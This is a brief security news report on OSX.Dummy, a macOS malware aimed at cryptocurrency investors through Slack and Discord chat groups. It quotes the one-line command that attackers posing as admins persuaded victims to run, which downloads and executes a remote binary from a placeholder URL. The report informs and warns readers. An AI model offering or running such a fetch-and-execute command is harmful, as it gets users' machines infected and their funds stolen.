A new macOS malware, dubbed OSX.Dummy, has been targeting cryptocurrency investors via both Slack and Discord chat apps. The malware was first spotted by security researcher, Remco Verhoef, who posted details of his findings on the SANS InfoSec Handlers Diary Blog on Friday.
Remco said multiple attacks were observed over the past week where attackers were targeting crypto related chat groups while impersonating admins or key people.
The script users are asked to run:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
After a user runs the script, a malicious and massively sized binary (34M) will download and execute on the victim’s system.
Security researcher Patrick Wardle wrote up additional details on the malware threat on his Objective-See blog.
In conclusion, the malware features are quite ‘dumb’ in terms of infection method, binary size, persistence mechanism and limited capabilities. Hence, the name is quite fitting.